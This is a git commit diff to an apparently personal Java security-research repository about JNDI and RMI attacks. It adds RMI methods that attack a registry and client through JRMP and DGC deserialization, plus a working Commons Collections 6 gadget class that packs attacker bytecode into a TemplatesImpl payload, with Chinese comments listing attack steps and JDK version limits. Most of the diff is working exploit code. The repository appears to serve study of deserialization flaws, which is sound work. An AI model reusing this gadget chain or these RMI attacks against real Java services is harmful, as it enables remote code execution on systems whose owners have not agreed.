更新JNDI代码

1diot9 · 1diot9 · commit 41a58f268b1c · 2026-02-03T14:47:53.000+08:00
diff --git a/JNDI/JNDI/.idea/misc.xml b/JNDI/JNDI/.idea/misc.xml
diff --git a/JNDI/JNDI/.idea/vcs.xml b/JNDI/JNDI/.idea/vcs.xml
diff --git a/JNDI/JNDI/pom.xml b/JNDI/JNDI/pom.xml
@@ -15,6 +15,11 @@
     </properties>
 
    <dependencies>
+       <dependency>
+           <groupId>commons-beanutils</groupId>
+           <artifactId>commons-beanutils</artifactId>
+           <version>1.9.4</version>
+       </dependency>
        <dependency>
            <groupId>com.alibaba</groupId>
            <artifactId>fastjson</artifactId>
@@ -55,6 +60,11 @@
            <artifactId>unboundid-ldapsdk</artifactId>
            <version>3.2.0</version>
        </dependency>
+       <dependency>
+           <groupId>commons-collections</groupId>
+           <artifactId>commons-collections</artifactId>
+           <version>3.2.1</version>
+       </dependency>
    </dependencies>
 
 </project>
diff --git a/JNDI/JNDI/src/main/java/RMI/Client.java b/JNDI/JNDI/src/main/java/RMI/Client.java
@@ -7,17 +7,25 @@
 
 public class Client {
     public static void main(String[] args) throws Exception {
-        serverAttackClientWithJRMP();
+        evilExceptionWithJRMP();
     }
 
-    // 从registry获取的stub指向恶意skel，通过DGC JRMP，实现server打client
-    public static void serverAttackClientWithJRMP() throws Exception{
+    // 之前写错了，这里反序列化是因为java-chains直接返回了恶意Exception对象，不是触发JRMP
+    public static void evilExceptionWithJRMP() throws Exception{
         Registry registry = LocateRegistry.getRegistry("127.0.0.1", 13999);
         registry.lookup("951d14");
     }
 
+    // 从registry获取的stub指向恶意skel，通过DGC JRMP，实现server打client
+    // 步骤：打开Register，Server绑定恶意skel到Register，关掉Server，打开Client，lookup Server绑定的恶意对象
+    public static void serverAttackClientWithJRMP() throws Exception{
+        Registry registry = LocateRegistry.getRegistry("127.0.0.1", 1099);
+        registry.lookup("evil25");
+    }
+
+
     public static void rmiDeser() throws Exception{
         Registry registry = LocateRegistry.getRegistry("127.0.0.1", 50388);
-        registry.lookup("c4e578");
+        registry.lookup("fcdf0b");
     }
 }
diff --git a/JNDI/JNDI/src/main/java/RMI/MyRegistry.java b/JNDI/JNDI/src/main/java/RMI/MyRegistry.java
@@ -9,6 +9,6 @@
 public class MyRegistry {
     public static void main(String[] args) throws RemoteException, AlreadyBoundException {
         java.rmi.registry.Registry registry = LocateRegistry.createRegistry(1099);
-        registry.bind("hello", new HelloImpl());
+        while (true);
     }
 }
diff --git a/JNDI/JNDI/src/main/java/RMI/Server.java b/JNDI/JNDI/src/main/java/RMI/Server.java
@@ -1,7 +1,9 @@
 package RMI;
 
 import com.alibaba.fastjson.JSONArray;
+import remoteObj.Hello;
 import remoteObj.HelloImpl;
+import remoteObj.HelloImpl2;
 import sun.rmi.server.UnicastRef;
 import sun.rmi.transport.LiveRef;
 import sun.rmi.transport.tcp.TCPEndpoint;
@@ -12,18 +14,23 @@
 
 import javax.management.BadAttributeValueExpException;
 import javax.xml.transform.Templates;
+import java.io.IOException;
+import java.io.Serializable;
 import java.lang.reflect.Proxy;
+import java.net.ServerSocket;
 import java.rmi.Remote;
 import java.rmi.registry.LocateRegistry;
 import java.rmi.registry.Registry;
 import java.rmi.server.ObjID;
+import java.rmi.server.RMIServerSocketFactory;
 import java.rmi.server.RemoteObjectInvocationHandler;
+import java.rmi.server.UnicastRemoteObject;
 import java.util.Random;
 
 public class Server {
 
     public static void main(String[] args) throws Exception {
-        serverAttackRegistryWithJRMP();
+        serverAttackRegistryWithBind();
     }
 
     // 正常绑定远程对象
@@ -53,7 +60,7 @@ public static void serverAttackRegistryWithBind() throws Exception {
         registry.bind("evil1", o);
     }
 
-    // 将stub里的skel地址指向恶意JRMP服务，实现server打registry
+    // 将stub里的skel地址指向恶意JRMP服务，实现server打registry，<8u231
     public static void serverAttackRegistryWithJRMP() throws Exception {
         ObjID id = new ObjID(new Random().nextInt()); // RMI registry
         TCPEndpoint te = new TCPEndpoint("127.0.0.1", 13999);
@@ -64,9 +71,24 @@ public static void serverAttackRegistryWithJRMP() throws Exception {
         }, obj);
 
         Registry registry = LocateRegistry.getRegistry("127.0.0.1", 1099);
-        registry.bind("evil24", proxy);
+        registry.bind("evil25", proxy);
     }
 
+    // gemini3给出的方法
+    public static void aiServerAttackRegistryWithJRMP() throws Exception {
+        // 1. 设置公网 IP（Stub 中的 Host）
+        System.setProperty("java.rmi.server.hostname", "127.0.0.1");
+        // 定义外部公网端口 (Stub 中的 Port，也是 Registry/DGC 尝试连接的端口)
+        int dgcPort = 13999;
+        // 定义内部真实端口 (Server 实际监听的端口)
+        int serverPort = 13990;
+        Hello hello = new HelloImpl2();
+        Remote stub = UnicastRemoteObject.exportObject(hello, dgcPort, null, new Server.NatServerSocketFactory(serverPort));
+        Registry registry = LocateRegistry.getRegistry("127.0.0.1", 1099);
+        registry.bind("HelloImpl", stub);
+    }
+
+
     // 通过DGC JRMP实现registry打server
     public static void registerAttackServer() throws Exception {
         // java-chains启动恶意JRMP服务
@@ -75,4 +97,21 @@ public static void registerAttackServer() throws Exception {
         registry.bind("evil3", hello);
     }
 
+    static class NatServerSocketFactory implements RMIServerSocketFactory, Serializable {
+        private int localRealPort;
+
+        public NatServerSocketFactory(int localRealPort) {
+            this.localRealPort = localRealPort;
+        }
+
+        @Override
+        public ServerSocket createServerSocket(int port) throws IOException {
+            // 【关键点】
+            // RMI 传入的 port 参数是我们在 exportObject 时指定的“公网端口”(9000)
+            // 但我们直接忽略它，强行绑定到“本地真实端口”(8000)
+            System.out.println("RMI asked to bind to " + port + ", but actually binding to " + localRealPort);
+            return new ServerSocket(localRealPort);
+        }
+    }
+
 }
diff --git a/JNDI/JNDI/src/main/java/gadget/CC6.java b/JNDI/JNDI/src/main/java/gadget/CC6.java
@@ -0,0 +1,85 @@
+package gadget;
+
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
+import javassist.ClassPool;
+import javassist.CtClass;
+import org.apache.commons.collections.Transformer;
+import org.apache.commons.collections.functors.ChainedTransformer;
+import org.apache.commons.collections.functors.ConstantTransformer;
+import org.apache.commons.collections.functors.InvokerTransformer;
+import org.apache.commons.collections.map.LazyMap;
+
+import java.io.ByteArrayInputStream;
+import java.io.File;
+import java.io.FileInputStream;
+import java.io.IOException;
+import java.lang.annotation.Retention;
+import java.lang.reflect.Constructor;
+import java.lang.reflect.Field;
+import java.util.HashMap;
+import java.util.Map;
+
+/**
+ * Commons Collections 6 (CC6) 反序列化利用链
+ */
+public class CC6 {
+
+    public static Object getPayload(byte[] evilByteCode, String evilClassPath) throws Exception {
+        // 获取实际的字节数组
+        byte[] actualByteCode = evilByteCode;
+        if (actualByteCode == null && evilClassPath != null) {
+            actualByteCode = loadBytesFromFile(evilClassPath);
+        }
+
+        if (actualByteCode == null) {
+            throw new IllegalArgumentException("Either byte[] or String path must be provided");
+        }
+
+        // 创建TemplatesImpl实例
+        TemplatesImpl templatesImpl = new TemplatesImpl();
+        
+        // 设置必要的字段
+        setFieldValue(templatesImpl, "_bytecodes", new byte[][]{actualByteCode});
+        setFieldValue(templatesImpl, "_name", "EvilClass");
+        setFieldValue(templatesImpl, "_tfactory", new TransformerFactoryImpl());
+
+        // 创建transformer链
+        Transformer[] transformers = new Transformer[]{
+            new ConstantTransformer(templatesImpl),
+            new InvokerTransformer("newTransformer", null, null)
+        };
+
+        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
+
+        // 创建HashMap和LazyMap
+        HashMap<Object, Object> hashMap = new HashMap<>();
+        Map lazyMap = LazyMap.decorate(hashMap, chainedTransformer);
+
+        // 添加到hashMap中触发
+        hashMap.put("yy", 1);
+
+        return lazyMap;
+    }
+
+    /**
+     * 从文件路径加载字节数组
+     */
+    private static byte[] loadBytesFromFile(String filePath) throws IOException {
+        File file = new File(filePath);
+        FileInputStream fis = new FileInputStream(file);
+        byte[] bytes = new byte[(int) file.length()];
+        fis.read(bytes);
+        fis.close();
+        return bytes;
+    }
+
+    /**
+     * 设置对象字段值
+     */
+    private static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
+        Field field = obj.getClass().getDeclaredField(fieldName);
+        field.setAccessible(true);
+        field.set(obj, value);
+    }
+}
diff --git a/JNDI/JNDI/src/main/java/remoteObj/HelloImpl2.java b/JNDI/JNDI/src/main/java/remoteObj/HelloImpl2.java
@@ -0,0 +1,11 @@
+package remoteObj;
+
+import java.rmi.RemoteException;
+
+public class HelloImpl2 implements Hello {
+
+    @Override
+    public String hello(String name) throws RemoteException {
+        return "hello impl2";
+    }
+}

Original file line number	Diff line number	Diff line change
`@@ -9,6 +9,6 @@`
`9`	`9`	`public class MyRegistry {`
`10`	`10`	`public static void main(String[] args) throws RemoteException, AlreadyBoundException {`
`11`	`11`	`java.rmi.registry.Registry registry = LocateRegistry.createRegistry(1099);`
`12`		`- registry.bind("hello", new HelloImpl());`
	`12`	`+ while (true);`
`13`	`13`	`}`
`14`	`14`	`}`